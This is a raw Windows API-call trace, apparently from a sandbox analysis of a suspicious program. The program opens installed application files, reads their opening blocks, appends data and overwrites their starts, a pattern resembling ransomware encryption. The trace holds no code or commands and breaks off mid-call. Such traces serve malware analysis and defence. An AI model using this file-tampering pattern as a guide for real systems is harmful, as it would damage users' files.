returned 1 [0149.043] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.073] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa1d68 [0149.074] ReadFile (in: hFile=0x1dc, lpBuffer=0x288b118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288b118*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xa1d68 [0149.102] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.103] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0149.103] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0149.103] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.103] CloseHandle (hObject=0x1dc) returned 1 [0149.103] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.104] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x22 [0149.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.105] ReleaseMutex (hMutex=0x168) returned 1 [0149.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="components.manifest", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0149.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="components.manifest", cchWideChar=19, lpMultiByteStr=0x1f88ba4, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="components.manifest", lpUsedDefaultChar=0x0) returned 19 [0149.105] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f8fd58, nNumberOfBytesToRead=0x22, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f8fd58*, lpNumberOfBytesRead=0x311f2bc*=0x22, lpOverlapped=0x0) returned 1 [0149.106] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0149.106] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5aa, lpOverlapped=0x0) returned 1 [0149.106] CloseHandle (hObject=0x1dc) returned 1 [0149.106] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.107] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.107] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x63 [0149.107] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.107] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.107] ReleaseMutex (hMutex=0x168) returned 1 [0149.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dependentlibs.list", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0149.107] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dependentlibs.list", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dependentlibs.list", lpUsedDefaultChar=0x0) returned 18 [0149.107] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f56e08, nNumberOfBytesToRead=0x63, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56e08*, lpNumberOfBytesRead=0x311f2bc*=0x63, lpOverlapped=0x0) returned 1 [0149.108] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0149.108] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5eb, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5eb, lpOverlapped=0x0) returned 1 [0149.108] CloseHandle (hObject=0x1dc) returned 1 [0149.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nssdbm3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\nssdbm3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.109] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.109] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x383 [0149.109] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.109] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.109] ReleaseMutex (hMutex=0x168) returned 1 [0149.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nssdbm3.chk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0149.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nssdbm3.chk", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nssdbm3.chk", lpUsedDefaultChar=0x0) returned 11 [0149.110] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x311f2bc*=0x383, lpOverlapped=0x0) returned 1 [0149.138] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0149.138] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b68*, nNumberOfBytesToWrite=0x90b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesWritten=0x311f2d0*=0x90b, lpOverlapped=0x0) returned 1 [0149.139] CloseHandle (hObject=0x1dc) returned 1 [0149.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\uninstall\\helper.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\uninstall\\helper.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0152.968] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.968] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xd4fa0 [0152.968] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.968] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.968] ReleaseMutex (hMutex=0x168) returned 1 [0152.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="helper.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0152.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="helper.exe", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="helper.exe", lpUsedDefaultChar=0x0) returned 10 [0152.968] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0152.971] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.972] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd3fa0 [0152.972] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.974] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xd3fa0 [0152.975] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.976] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0152.976] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0152.976] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0152.977] CloseHandle (hObject=0x1cc) returned 1 [0152.977] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt-stub.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt-stub.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0152.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a670 [0152.978] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.978] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.978] ReleaseMutex (hMutex=0x168) returned 1 [0152.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapprt-stub.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0152.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="webapprt-stub.exe", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webapprt-stub.exe", lpUsedDefaultChar=0x0) returned 17 [0152.979] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a5b78, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a5b78*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0152.981] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x19670 [0152.981] ReadFile (in: hFile=0x1cc, lpBuffer=0x25adbd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25adbd8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0152.982] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x19670 [0152.982] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0152.982] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0152.982] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a9ba8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a9ba8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0152.982] CloseHandle (hObject=0x1cc) returned 1 [0152.983] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.983] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets", lpFilePart=0x311f690*="Workflow.VisualBasic.Targets") returned 0x66 [0152.983] GetLastError () returned 0x5 [0152.983] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑ꩨǷ\x01") returned 0x13 [0152.983] LocalFree (hMem=0x69e2b0) returned 0x0 [0152.983] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0152.983] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0152.984] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.984] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.984] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.visualbasic.targets")) returned 0x20 [0152.985] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.985] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe", lpFilePart=0x311f690*="wabmig.exe") returned 0x2e [0152.985] GetLastError () returned 0x5 [0152.985] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑ꩨǷ\x01") returned 0x13 [0152.985] LocalFree (hMem=0x69e2b0) returned 0x0 [0152.985] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0152.985] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0152.985] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.986] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.986] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files (x86)\\windows mail\\wabmig.exe")) returned 0x20 [0152.986] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\pidgin.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\pidgin.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.986] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\pidgin.exe", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\pidgin.exe", lpFilePart=0x311f690*="pidgin.exe") returned 0x36 [0152.986] GetLastError () returned 0x20 [0152.986] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀i̑폈H̑퐔H̑L̑ꩨǷ\x01") returned 0x51 [0152.987] LocalFree (hMem=0x696c00) returned 0x0 [0152.987] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0152.987] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0152.987] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.987] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0152.987] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\pidgin.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\pidgin.exe")) returned 0x20 [0152.988] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0152.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x109d000 [0152.989] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0152.989] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0152.990] ReleaseMutex (hMutex=0x168) returned 1 [0152.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10116_MUI.msp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0152.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10116_MUI.msp", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrUpd10116_MUI.msp", lpUsedDefaultChar=0x0) returned 23 [0152.990] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0152.993] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0152.995] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0152.996] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0152.998] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0153.000] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0153.002] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0153.003] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef00000 [0153.016] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0154.786] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0154.786] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x311f23c, dwLength=0x1c | out: lpBuffer=0x311f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0154.786] VirtualAlloc (lpAddress=0x0, dwSize=0xa0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ee60000 [0154.804] VirtualFree (lpAddress=0x7ef00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.808] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x109b000 [0154.809] ReadFile (in: hFile=0x1cc, 